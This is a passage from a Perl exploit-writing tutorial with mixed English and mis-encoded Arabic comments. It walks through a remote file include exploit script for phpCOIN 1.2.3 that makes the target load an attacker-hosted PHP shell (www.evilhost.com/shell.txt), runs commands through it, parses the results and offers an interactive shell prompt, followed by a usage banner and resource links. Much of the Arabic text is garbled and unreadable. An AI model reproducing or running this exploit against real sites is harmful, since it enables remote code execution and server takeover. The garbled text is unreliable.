$res = $xpl->request($req);
#‫ ا‬$res K r‫ ا‬b%Y
get ? LkA# †‫وا ي ا‬
K r‫ ا‬get ‫ن "! ا‬z@
‫ و‬$info
# The response of the server to the GET request we sent is
stored in the $info variable
# K r‫ ا@ دم ? ا‬KoA# get ‫ "! ا‬,qz@
‫ و‬, #
‫و‬
$info
$info = $res->content;
$info =~ tr/[\n]/[ê]/;
#----------------------------------------------------------
# ? ‫ دة‬N‫ ا‬Y
  @^ u‫وط ا‬1‫ ? ا‬eo ‘b‫ه‬
K r‫š ا‬r>‫ ا‬get r> ‫@م او‬A‫ ? اد> ل ا‬r@‫=ً اذا آ ن ا‬f
!" r> Y ‫=
ل‬f L]‫ "! ا‬r@‫ "! او ا‬r@‫ او ا‬$‫"! ا‬
aS Y] ‫ي‬b‫ ا‬r@‫" ا‬N M,A‫ن ? ا‬I
uI ‫^& ل‬$‫ا‬
#Simple conditional

if (!$cmd) {
print "\nEnter a Command\n\n"; $info ="";
}
#Tests to see if there was a connection failure or the
command failed
#šr> $‫š او ا‬r> ‫^& ل‬$‫
@ اذا آ ن ا‬Y‫ه‬
elsif ($info =~/failed to open stream: HTTP request
failed!/ || $info =~/: Cannot execute a blank command in
<b>/)
{
print "\nCould Not Connect to cmd Host or Invalid
Command Variable\n";
exit;
}
# Another ElseIf, this is used incase the command is
invalid like if you typed "asdfjasdf" as a command
# Y‫ ه‬ElseIf =f   t { ‫وا‬$‫ ا‬pN” ‫" اذا‬asdfjasdf"
elsif ($info =~/^<br.\/>.<b>Warning/) {
print "\nInvalid Command\n\n";
 www.t0010.com

Perl Writing Exploits

};
#----------------------------------------------------------------
# !," ‫=ل‬#=  
‫ او …و‬# #‫د ا‬I‫‘ ? ا‬r@‫‘ ا‬b‫ه‬
r‫‘ ا‬f‫دة " ا‬k ‫ اذا آ ن‬L]  † q‫^@ آد ا‬
 e
#
b ^" ‫ ث   ى‬# ‫ د‬N ‫" اذا آ ن ا ى‬Warning" l¶
‫ †
@ج‬q‫ ا‬exits !YN^ u‫‘ " ا‬f‫ ا‬k^$ ?N‫ ا‬L]‫ا‬
if($info =~
/(.+)<br.\/>.<b>Warning.(.+)<br.\/>.<b>Warning/)
{
$final = $1;
$final=~ tr/[ê]/[\n]/;
print "\n$final\n";
last;
}
#----------------------------------------------------------------
#‘b‫=ل وه‬#$‫ ا‬u e ‫
ي‬lA‫ا ا‬b‫ ه‬else MI !‫ه‬
MI  S A‫وط ا‬1‫ا‬
else {
print "[shell] \$";
} # end of else
} # end of while(<STDIN>)
} # end of while
last;

#Sub-Rountines
#The end of the code is our sub rountine "header" used
earlier in the exploit
sub header()
{
print q{
++++++++++++++++++++++++++++++++++++
++++++++++
phpCOIN 1.2.3 -- Remote Include Exploit
Vulnerablity found by: TimQ
Exploit coded by: Warpboy
Original PoC: http://milw0rm.com/exploits/2254
++++++++++++++++++++++++++++++++++++
++++++++++
}
 www.t0010.com

Perl Writing Exploits

}
#------------------------------------------------------------
#This is just our "usg" sub-rountine and a simple exit if all
the code is bypassed due to errors ect
sub usg()
{
header();
print q{
====================================
==================================
Usage: perl sploit.pl <phpCOIN FULL PATH> <Shell
Location> <Shell Cmd>
<phpCOIN FULL PATH> - Path to site exp. www.site.com
<Shell Location> - Path to shell exp.
www.evilhost.com/shell.txt
<Shell Cmd> - Command variable for php shell
Example: perl C:\sploit.pl
http://www.site.com/phpCOIN/
====================================
===================================
};
exit();
}

#-----------------------------------------------------------
 www.t0010.com

Perl Writing Exploits


,Y‫ا‬

K{ ,Ó !" ‫ ء‬e‫ ا‬$‫ ا‬lIY ‘kq 

Ô‫ ور[ ا‬lI e ‫=م‬A‫وا‬

AlhambA l‫ا>آ‬

:M
‫ا‬

security-0000@hotmail.com

secure0000@yahoo.com

‫ "!  ال‬L# ‫و‬

http://www.cpan.org
http://www.securitydb.org/forum/
http://www.programmingtutorials.com/perl.aspx
http://www.pageresource.com/cgirec/index2.htm
http://www.cclabs.missouri.edu/thing...erlcourse.html
http://www.ebb.org/PickingUpPerl/pickingUpPerl_toc.html
http://vsbabu.org/tutorials/perl/
http://www.freeprogrammingresources.com/perl.html
http://www.thescripts.com/serverside...uru/page0.html
http://www.perl.com/pub/a/2002/08/20/perlandlwp.html
http://www.perl.com
http://www.perlmonks.org/index.pl?node=Tutorials
www.google.com

Ô  S l^